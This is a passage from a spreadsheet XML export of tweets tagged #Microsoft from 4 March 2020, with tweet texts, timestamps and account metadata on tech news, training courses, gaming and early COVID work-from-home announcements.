    <t>{'id': 142583197, 'id_str': '142583197', 'name': 'Calsoft Inc.', 'screen_name': 'CalsoftInc', 'location': 'San Jose, CA', 'description': 'Calsoft is a leading software product engineering services company specializing in #Storage, #Networking, #Virtualization, #Cloud and #IoT #Analytics domains.', 'url': 'https://t.co/jIdjjWzAuf', 'entities': {'url': {'urls': [{'url': 'https://t.co/jIdjjWzAuf', 'expanded_url': 'https://calsoftinc.com/', 'display_url': 'calsoftinc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1275, 'friends_count': 2870, 'listed_count': 216, 'created_at': 'Tue May 11 07:04:13 +0000 2010', 'favourites_count': 143, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7898,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'http://pbs.twimg.com/profile_images/1213125672165466113/QWo7Hyjo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213125672165466113/QWo7Hyjo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/142583197/1578982604', 'profile_link_color': '00BFFF', 'profile_sidebar_border_color': '816F46', 'profile_sidebar_fill_color': 'C8EDFF', 'profile_text_color': '2B0C13', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:00:35 +0000 2020</t>
  </si>
  <si>
    <t>New #Podcast is out and we're talking Business Central March 2020 news, Late Payment Prediction functionality included within Business Central, and top 10 things you need to know about Business Central Apps.
https://t.co/z6uaWpuBKU
#MSDyn365bc #Microsoft #apps #extensions</t>
  </si>
  <si>
    <t>Wed Mar 04 17:00:33 +0000 2020</t>
  </si>
  <si>
    <t>Upgrade your skill set in Microsoft Access! Our Level 2 class on March 12 - 13 still has spots available. This class will introduce higher level concepts like advanced forms and web-based objects. Visit https://t.co/GfVZbDbSZS to register now! #UAlberta #Microsoft #database #yeg https://t.co/0oZvGQB08H</t>
  </si>
  <si>
    <t>{'id': 224380575, 'id_str': '224380575', 'name': 'Technology Training Centre- TTC', 'screen_name': 'TTCUOFA', 'location': 'Edmonton, Alberta, Canada', 'description': 'The Technology Training Centre is a leading institution in computer software training since 1997.', 'url': 'http://t.co/NtoU18equM', 'entities': {'url': {'urls': [{'url': 'http://t.co/NtoU18equM', 'expanded_url': 'http://www.ttc.ualberta.ca', 'display_url': 'ttc.ualberta.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 348, 'friends_count': 326, 'listed_count': 17, 'created_at': 'Wed Dec 08 21:20:56 +0000 2010', 'favourites_count': 256, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1023,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'http://pbs.twimg.com/profile_images/800767638586552320/7y_bSSBV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/800767638586552320/7y_bSSBV_normal.jpg', 'profile_link_color': '007C40', 'profile_sidebar_border_color': '7A7D82', 'profile_sidebar_fill_color': 'D9DDE0', 'profile_text_color': '094FAB', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:00:24 +0000 2020</t>
  </si>
  <si>
    <t>This day in 1991, Space Quest IV: Roger Wilco and the Time Rippers - DOS version released. (United States) #MSDOS #Microsoft #oldschool #retro #RETROGAMING https://t.co/RCjauJdRpA</t>
  </si>
  <si>
    <t>{'id': 3853477461, 'id_str': '3853477461', 'name': 'Corporate Gamer', 'screen_name': 'CorporateGamer9', 'location': 'MontrÃ©al, QuÃ©bec', 'description': 'Videogame Reviewer, Twitch Streamer and Podcaster.', 'url': 'https://t.co/gFZITqLNSI', 'entities': {'url': {'urls': [{'url': 'https://t.co/gFZITqLNSI', 'expanded_url': 'https://twitch.tv/corporategamer9', 'display_url': 'twitch.tv/corporategamer9', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1002, 'friends_count': 1838, 'listed_count': 31, 'created_at': 'Sat Oct 03 15:41:56 +0000 2015', 'favourites_count': 2600, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7124,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'http://pbs.twimg.com/profile_images/1168598815496134656/0fmqjMv9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168598815496134656/0fmqjMv9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3853477461/1578721370',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</si>
  <si>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17:00:17 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/k4nd9IRzya</t>
  </si>
  <si>
    <t>Wed Mar 04 16:59:23 +0000 2020</t>
  </si>
  <si>
    <t>John Hoegger of Microsoft discusses how to better value diversity in the workforce.
https://t.co/3GJ8u7eDVH
@Microsoft @SoniaTagare @theCUBE #WiDS2020 #theCUBE #Microsoft #EnterpriseTech #WomeninTech #diversity #datascience https://t.co/lyh1aEZUkO</t>
  </si>
  <si>
    <t>{'id': 1154831410219192320, 'id_str': '1154831410219192320', 'name': 'Women in Tech', 'screen_name': 'CUBEWomen', 'location': 'Worldwide ', 'description': 'theCUBE covers enterprise tech innovation worldwide with live, unscripted interviews featuing thought leaders in companies large and small', 'url': 'https://t.co/cbEDMBW14I', 'entities': {'url': {'urls': [{'url': 'https://t.co/cbEDMBW14I', 'expanded_url': 'http://www.thecube.net', 'display_url': 'thecube.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 180, 'friends_count': 454, 'listed_count': 4, 'created_at': 'Fri Jul 26 19:10:38 +0000 2019', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 667, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1154880270052446208/QqJueiAp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154880270052446208/QqJueiAp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1154831410219192320/1564168969',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</si>
  <si>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16:58:24 +0000 2020</t>
  </si>
  <si>
    <t>#Google &amp;amp; #Microsoft are offering free trial versions of enterprise conferencing tools so you can keep working/studying from the comfort of home! For Microsoft Teams Premium, you can go here https://t.co/ZnxEGf4ZbW. For G Suite Enterprise, you can go here https://t.co/o6cGKXmpPQ.</t>
  </si>
  <si>
    <t>{'id': 936684316423225350, 'id_str': '936684316423225350', 'name': 'Butter - Subscription Hub', 'screen_name': 'JustButterIt', 'location': 'Toronto, Ontario', 'description': 'Easily organize your memberships and subscriptions.\n\nTweeting about all things subscription.', 'url': 'https://t.co/Ynbi6PeMzs', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ynbi6PeMzs', 'expanded_url': 'https://butter.link/tw', 'display_url': 'butter.link/tw', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3345, 'friends_count': 3206, 'listed_count': 16, 'created_at': 'Fri Dec 01 19:51:58 +0000 2017', 'favourites_count': 91, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 402,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'http://pbs.twimg.com/profile_images/964716617098780673/6IdrYTpF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/964716617098780673/6IdrYTpF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/936684316423225350/1518840934',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</si>
  <si>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16:54:54 +0000 2020</t>
  </si>
  <si>
    <t>#Cloud computing's "Big Three" -- #Amazon Web Services (#AWS), #Microsoft and #Google -- are the leaders in Gartner's recent study of cloud-based artificial intelligence (#AI) developer tools, with AWS earning the highest marks. https://t.co/dxeBW6oSYi</t>
  </si>
  <si>
    <t>{'id': 3145393748, 'id_str': '3145393748', 'name': 'AWS Insider', 'screen_name': 'AWSInsider', 'location': 'Irvine, CA', 'description': 'http://t.co/PGXaEJKTUF is the independent resource for Amazon Web Services. A publication of 1105 Media.', 'url': 'http://t.co/PGXaEJKTUF', 'entities': {'url': {'urls': [{'url': 'http://t.co/PGXaEJKTUF', 'expanded_url': 'http://AWSInsider.net', 'display_url': 'AWSInsider.net', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/PGXaEJKTUF', 'expanded_url': 'http://AWSInsider.net', 'display_url': 'AWSInsider.net', 'indices': [0, 22]}]}}, 'protected': False, 'followers_count': 723, 'friends_count': 1309, 'listed_count': 44, 'created_at': 'Wed Apr 08 23:30:08 +0000 2015', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 765, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1EADE3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/588400368897392643/_rUaX5aV_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/588400368897392643/_rUaX5aV_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3145393748/1429121533',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</si>
  <si>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16:54:46 +0000 2020</t>
  </si>
  <si>
    <t>It's time for.... 
The Baseline Protocol
https://t.co/YYAHGgBtPH
#ethereum #blockchain #Microsoft #ConsenSys #ZeroKnowledge $eth $link $ubt $mkr</t>
  </si>
  <si>
    <t>{'id': 1018125626052661250, 'id_str': '1018125626052661250', 'name': 'Stefan', 'screen_name': 'GortStefan', 'location': '', 'description': 'Ambassador at Unibright, love for tech.\n#DeFi #Blockchain #AI', 'url': 'https://t.co/QagkN1KLjM', 'entities': {'url': {'urls': [{'url': 'https://t.co/QagkN1KLjM', 'expanded_url': 'http://Unibright.io', 'display_url': 'Unibright.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 217, 'friends_count': 388, 'listed_count': 1, 'created_at': 'Sat Jul 14 13:30:39 +0000 2018', 'favourites_count': 2573, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 767, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1035237478536499200/nxQExcX4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1035237478536499200/nxQExcX4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1018125626052661250/1535654694',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</si>
  <si>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16:52:00 +0000 2020</t>
  </si>
  <si>
    <t>Take advantage of challenge labs to validate your learner's skills in a particular area and prepare them for certification exams.
See more challenge labs  &amp;gt; https://t.co/khO09XCIjP
Start re-selling challenge labs &amp;gt; https://t.co/7J4c2F9Uoq
#microsoft #winserv #techskills https://t.co/vcemWlBLbk</t>
  </si>
  <si>
    <t>{'id': 2815382394, 'id_str': '2815382394', 'name': 'Learn on Demand Systems', 'screen_name': 'LoDSystems', 'location': 'The Cloud', 'description': 'We empower organizations to create, manage and deliver Digital Learning experiences simply, reliably and securely. For support visit https://t.co/P2R4X77HTJ', 'url': 'https://t.co/8lnlDPztB9', 'entities': {'url': {'urls': [{'url': 'https://t.co/8lnlDPztB9', 'expanded_url': 'http://www.learnondemandsystems.com/', 'display_url': 'learnondemandsystems.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/P2R4X77HTJ', 'expanded_url': 'https://lods.one/support', 'display_url': 'lods.one/support', 'indices': [133, 156]}]}}, 'protected': False, 'followers_count': 1853, 'friends_count': 825, 'listed_count': 34, 'created_at': 'Wed Sep 17 19:03:14 +0000 2014', 'favourites_count': 580, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1216,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'http://pbs.twimg.com/profile_images/1093513179693383680/mjD-xAmd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1093513179693383680/mjD-xAmd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2815382394/1568645296', 'profile_link_color': '707372',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</si>
  <si>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16:51:36 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Bringing #Cortana Changes to Spring Windows 10 Update https://t.co/SIW7kbPRiY #Windows10</t>
  </si>
  <si>
    <t>{'id': 1026886265893842944, 'id_str': '1026886265893842944', 'name': 'Pure AI com', 'screen_name': 'PureAINews', 'location': '', 'description': 'Visit https://t.co/5GRsHCsgBr for news and views on artificial intelligence, machine learning, IoT, edge computing and more related technologies.', 'url': 'https://t.co/gEDh0yd3Jd', 'entities': {'url': {'urls': [{'url': 'https://t.co/gEDh0yd3Jd', 'expanded_url': 'https://pureai.com/home.aspx', 'display_url': 'pureai.com/home.aspx', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/5GRsHCsgBr', 'expanded_url': 'http://PureAI.com', 'display_url': 'PureAI.com', 'indices': [6, 29]}]}}, 'protected': False, 'followers_count': 95, 'friends_count': 111, 'listed_count': 6, 'created_at': 'Tue Aug 07 17:42:19 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 135, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1026889365895561216/Bx8AhXEg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1026889365895561216/Bx8AhXEg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1026886265893842944/1533664499',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</si>
  <si>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16:50:05 +0000 2020</t>
  </si>
  <si>
    <t>Download the worksheet: give yourself a productivity boost with these hidden Windows 10 features. https://t.co/1Oght5OQ3r #Windows10 #Microsoft https://t.co/UiTqyLjU0R</t>
  </si>
  <si>
    <t>{'id': 1277946404, 'id_str': '1277946404', 'name': 'Ten Ten Systems Ltd', 'screen_name': 'tentensystems', 'location': 'United Kingdom', 'description': "Providing IT solutions to everyday business problems. From infrastructure to security, procurement to installation - we're here to help!", 'url': 'http://t.co/6trcxi7FZ4', 'entities': {'url': {'urls': [{'url': 'http://t.co/6trcxi7FZ4', 'expanded_url': 'http://1010systems.co.uk', 'display_url': '1010systems.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 374, 'friends_count': 1266, 'listed_count': 32, 'created_at': 'Mon Mar 18 14:50:26 +0000 2013', 'favourites_count': 600, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5262,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'http://pbs.twimg.com/profile_images/459638423863566337/UmGasI81_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/459638423863566337/UmGasI81_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1277946404/1539008319',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</si>
  <si>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Wed Mar 04 16:49:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Cisco this week announced the "seamless integration" of the two companies' Internet of Things (#IoT) and #cloud products, enabling more edge computing scenarios. https://t.co/5e1068h6fA #EdgeComputing</t>
  </si>
  <si>
    <t>Wed Mar 04 16:47:37 +0000 2020</t>
  </si>
  <si>
    <t>Join ISG for an ITSource &amp;amp; SAM Atlanta Luncheon. Discover 2020 #sourcing trends, #softwaresourcing tactics, sourcing pitfalls to avoid and negotiation strategies that have been successful with #Microsoft, #Oracle, #Cisco and #SAP. #SoftwareAssetManagement https://t.co/3WrS2VZC81</t>
  </si>
  <si>
    <t>{'id': 866064975684653060, 'id_str': '866064975684653060', 'name': 'Ahmed Guitouni', 'screen_name': 'RealAzGuitouni', 'location': 'United States, USA', 'description': 'Focus is NOT to say Yes... Focus is always to say NO...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 51, 'friends_count': 214, 'listed_count': 0, 'created_at': 'Sat May 20 22:55:55 +0000 2017', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 439,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'http://pbs.twimg.com/profile_images/1114377990144757761/DB2qm6H-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1114377990144757761/DB2qm6H-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/866064975684653060/1554838073',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</si>
  <si>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16:45:30 +0000 2020</t>
  </si>
  <si>
    <t>I love when they slap me on the ass. And then they kiss her 
 #microsoft #apex https://t.co/2qMlpcrrL6</t>
  </si>
  <si>
    <t>{'id': 1235015953689317378, 'id_str': '1235015953689317378', 'name': 'Trina Chapman', 'screen_name': 'beoraltasac', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 34, 'listed_count': 0, 'created_at': 'Wed Mar 04 01:35:29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'http://pbs.twimg.com/profile_images/1235017444898594816/K8X0Y6hG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235017444898594816/K8X0Y6hG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235015953689317378/1583286165',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</si>
  <si>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16:44:39 +0000 2020</t>
  </si>
  <si>
    <t>How #Microsoft and the @NFL are working together on the NFL's #DigitalTransformation
#digitalstrategy #teamwork #technology #emergingtech 
https://t.co/AAhre4EYd9</t>
  </si>
  <si>
    <t>{'id': 775386429086134272, 'id_str': '775386429086134272', 'name': 'Lori Plumstead', 'screen_name': 'LoriPlumstead', 'location': 'Flemington, New Jersey', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 43, 'friends_count': 181, 'listed_count': 0, 'created_at': 'Mon Sep 12 17:31:45 +0000 2016', 'favourites_count': 1624, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 345, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/775389841995526144/yGAL8Op7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/775389841995526144/yGAL8Op7_normal.jpg',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</si>
  <si>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16:44:04 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 16:40:31 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #Cisco Partner on #IoT Device Connectivity Solutions https://t.co/ea9eBTxL1A</t>
  </si>
  <si>
    <t>Wed Mar 04 16:39:24 +0000 2020</t>
  </si>
  <si>
    <t>The Tomogunchi | Call of Duty: Modern Warfare #microsoft https://t.co/x0YLUj6Ch0</t>
  </si>
  <si>
    <t>{'id': 3131507609, 'id_str': '3131507609', 'name': 'Get Gamed', 'screen_name': 'BejahGames', 'location': 'Gamers World  ', 'description': '4TheBest #GAMERS Here to bring you the BEST #GAMER #REVIEWS &amp; #NEWS,  BEST VIDEO #GAMES exclusively for YOU #GetGamed  Pls also follow @RichardBejah', 'url': 'https://t.co/nKleOpwtgV', 'entities': {'url': {'urls': [{'url': 'https://t.co/nKleOpwtgV', 'expanded_url': 'http://RGBBlog.co/get-gamed/', 'display_url': 'RGBBlog.co/get-gamed/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1687, 'friends_count': 2794, 'listed_count': 105, 'created_at': 'Fri Apr 03 04:53:09 +0000 2015', 'favourites_count': 88, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 37316,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'http://pbs.twimg.com/profile_images/583881365839450112/gp5Bogpf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/583881365839450112/gp5Bogpf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3131507609/1428043629', 'profile_link_color': '000000',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</si>
  <si>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16:38:54 +0000 2020</t>
  </si>
  <si>
    <t>Outgrown QuickBooks? Need more functionality like interompany transactions in one database? https://t.co/LjR3AQdykU
#cloud #AccountingSoftware #Microsoft #BusinessSolutions #SmallBiz #Retailers #OnlineBiz #SubscriptionBilling #Entertainment #FilmIndustry #MediaAgencies #CRMUG https://t.co/0r7fT4pGaD</t>
  </si>
  <si>
    <t>Wed Mar 04 16:38:09 +0000 2020</t>
  </si>
  <si>
    <t>1/ I never got around to recording my thoughts on #HaloCE for PC. But, that is largely a moot point now since #Microsoft surprised us all with the sudden release of that content within the #HaloMCC PC version. So, here is the short version...</t>
  </si>
  <si>
    <t>Wed Mar 04 16:37:43 +0000 2020</t>
  </si>
  <si>
    <t>Congratulations to @MiamiDolphins &amp;amp; CIO #kimberlyrometo for being recognized for the work that they have done with @MicrosoftTeams and the @NFL #microsoft #teams 
https://t.co/rgzopbD04E</t>
  </si>
  <si>
    <t>{'id': 47730407, 'id_str': '47730407', 'name': 'Glen Benjamin', 'screen_name': 'glenbenjamin', 'location': 'Ft. Lauderdale, FL', 'description': 'I am a Mobility Cloud &amp; Tech Evangelist with @laninfotech who promotes the power of Data Center Microsoft Mobile\u200b/IoT Cloud CyberSecurity &amp; Tech Views are mine', 'url': 'https://t.co/uGIpzR3jqz', 'entities': {'url': {'urls': [{'url': 'https://t.co/uGIpzR3jqz', 'expanded_url': 'http://www.mobilitycloud.me', 'display_url': 'mobilitycloud.me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1899, 'friends_count': 1840, 'listed_count': 200, 'created_at': 'Tue Jun 16 20:08:20 +0000 2009', 'favourites_count': 34490, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 49355,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'http://pbs.twimg.com/profile_images/1203889326356148226/Dcpf31PG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1203889326356148226/Dcpf31PG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47730407/1575864477',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</si>
  <si>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16:35:35 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft allows employees to work from home amid coronavirus outbreak  #microsoft #employees #coronavirus #remote #workfromhome | #RoadmapforSuccess https://t.co/Wm7cQRGLbb https://t.co/cWjxuS96aG</t>
  </si>
  <si>
    <t>Wed Mar 04 16:35:34 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft allows employees to work from home amid coronavirus outbreak  #microsoft #employees #coronavirus #remote #workfromhome | #RoadmapforSuccess https://t.co/Ja7ieT64Sk https://t.co/7dfUVi0wzG</t>
  </si>
  <si>
    <t>Wed Mar 04 16:35:14 +0000 2020</t>
  </si>
  <si>
    <t>Project Cortex - Knowledge Management from Microsoft #km #knowledge #microsoft #projectcortex #knowledgecenter #information #sharepoint #navigator
 https://t.co/eRmkdThiPB</t>
  </si>
  <si>
    <t>{'id': 21562554, 'id_str': '21562554', 'name': 'M@S', 'screen_name': 'msoldner', 'location': 'Hamburg, Deutschland', 'description': '#Collaboration #mobilework #communication  #Cloud #Digitalization #Robots #Blockchain, #Agile #CyberSecurity #Innovation #SmartCity #mobility #technology', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 251, 'listed_count': 5, 'created_at': 'Sun Feb 22 12:39:48 +0000 2009', 'favourites_count': 42, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 422, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2B618A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1041367439076937730/i_Noi5sg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041367439076937730/i_Noi5sg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21562554/1581900683', 'profile_link_color': '1CA8DB',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</si>
  <si>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16:33:18 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for #MySQL and #MariaDB  Planned maintenance notification now in preview
- https://t.co/R5zEoug7jb
- https://t.co/OJNW4h0uNE
#Azure #Microsoft #Cloud #Database #Maintenance https://t.co/znZFJHlQV5</t>
  </si>
  <si>
    <t>Wed Mar 04 16:30:48 +0000 2020</t>
  </si>
  <si>
    <t>The usual suspects are leading the race for #AI: 
#tech giants like #Facebook, #Amazon, #Microsoft, #Google, &amp;amp; #Apple (FAMGA) have all been aggressively acquiring AI #startups- @CBinsights report
https://t.co/ZCakKGZ4R1 https://t.co/7ZeMQa8gXR</t>
  </si>
  <si>
    <t>{'id': 18229080, 'id_str': '18229080', 'name': 'Chris Rigatuso', 'screen_name': 'crigatuso', 'location': 'San Francisco, CA', 'description': 'AI-focused Venture Capitalist with Alpha Intelligence Capital.  Recording Artist, Producer, Musician.  Recent release https://t.co/4vauyoLSjj', 'url': 'https://t.co/zWUhJvphkk', 'entities': {'url': {'urls': [{'url': 'https://t.co/zWUhJvphkk', 'expanded_url': 'http://aicapital.ai/', 'display_url': 'aicapital.ai', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/4vauyoLSjj', 'expanded_url': 'http://bit.ly/Layersofmeaning', 'display_url': 'bit.ly/Layersofmeaning', 'indices': [118, 141]}]}}, 'protected': False, 'followers_count': 6200, 'friends_count': 2650, 'listed_count': 430, 'created_at': 'Thu Dec 18 23:51:21 +0000 2008', 'favourites_count': 3786, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3756,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'http://pbs.twimg.com/profile_images/378800000681929127/bb24236ead92e59fdbfdd23937c01b03_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000681929127/bb24236ead92e59fdbfdd23937c01b03_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18229080/1563285977', 'profile_link_color': '2FC2EF',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</si>
  <si>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Wed Mar 04 16:30:21 +0000 2020</t>
  </si>
  <si>
    <t>There's still time to RSVP: https://t.co/dXCyYqRDrg
#DevOps #IWD2020 #WomenInTech #WomenInData #WomenInDevOps #Microsoft #Meetup #Manche
#Manchestertech</t>
  </si>
  <si>
    <t>{'id': 2795051717, 'id_str': '2795051717', 'name': 'DevOps Exchange Hub', 'screen_name': 'TheDoxHub', 'location': 'London', 'description': "The world's largest #DevOps community meetup. Join the meetup group and come along for great talks, free beer and pizza!", 'url': 'http://t.co/0TKpp8gsKH', 'entities': {'url': {'urls': [{'url': 'http://t.co/0TKpp8gsKH', 'expanded_url': 'http://www.meetup.com/DevOps-Exchange-London/', 'display_url': 'meetup.com/DevOps-Exchangâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1496, 'friends_count': 2, 'listed_count': 63, 'created_at': 'Tue Sep 30 15:01:59 +0000 2014', 'favourites_count': 209, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 743,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'http://pbs.twimg.com/profile_images/517039595913883648/2NeLBFZW_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/517039595913883648/2NeLBFZW_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2795051717/1412106665',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</si>
  <si>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16:30:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and the NFL are expanding their alliance to bring more technology to one of the worlds most popular professional sports leagues. https://t.co/DmKmrv6Nnl</t>
  </si>
  <si>
    <t>Wed Mar 04 16:29:18 +0000 2020</t>
  </si>
  <si>
    <t>Join ISG for an ITSource &amp;amp; SAM Atlanta Luncheon. Discover 2020 #sourcing trends, #softwaresourcing tactics, sourcing pitfalls to avoid and negotiation strategies that have been successful with #Microsoft, #Oracle, #Cisco and #SAP. #SoftwareAssetManagement https://t.co/GE1epBHiIR</t>
  </si>
  <si>
    <t>{'id': 23103220, 'id_str': '23103220', 'name': 'Bill Huber', 'screen_name': 'SourceTransform', 'location': 'Blacksburg, Virginia ', 'description': 'Digital Platforms &amp; Solutions/Software Advisory Partner at ISG - Sourcing, Digital, Software, Transformation. All opinions expressed are solely my own.', 'url': 'https://t.co/X89w3zMo8f', 'entities': {'url': {'urls': [{'url': 'https://t.co/X89w3zMo8f', 'expanded_url': 'http://www.isg-one.com', 'display_url': 'isg-one.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2177, 'friends_count': 2245, 'listed_count': 93, 'created_at': 'Fri Mar 06 19:04:30 +0000 2009', 'favourites_count': 433, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2771,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'http://pbs.twimg.com/profile_images/610442031840636928/SrIrvzr__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/610442031840636928/SrIrvzr__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23103220/1372536818',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</si>
  <si>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16:29:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft cancels MVP Summit due to COVID-19 coronavirus fears
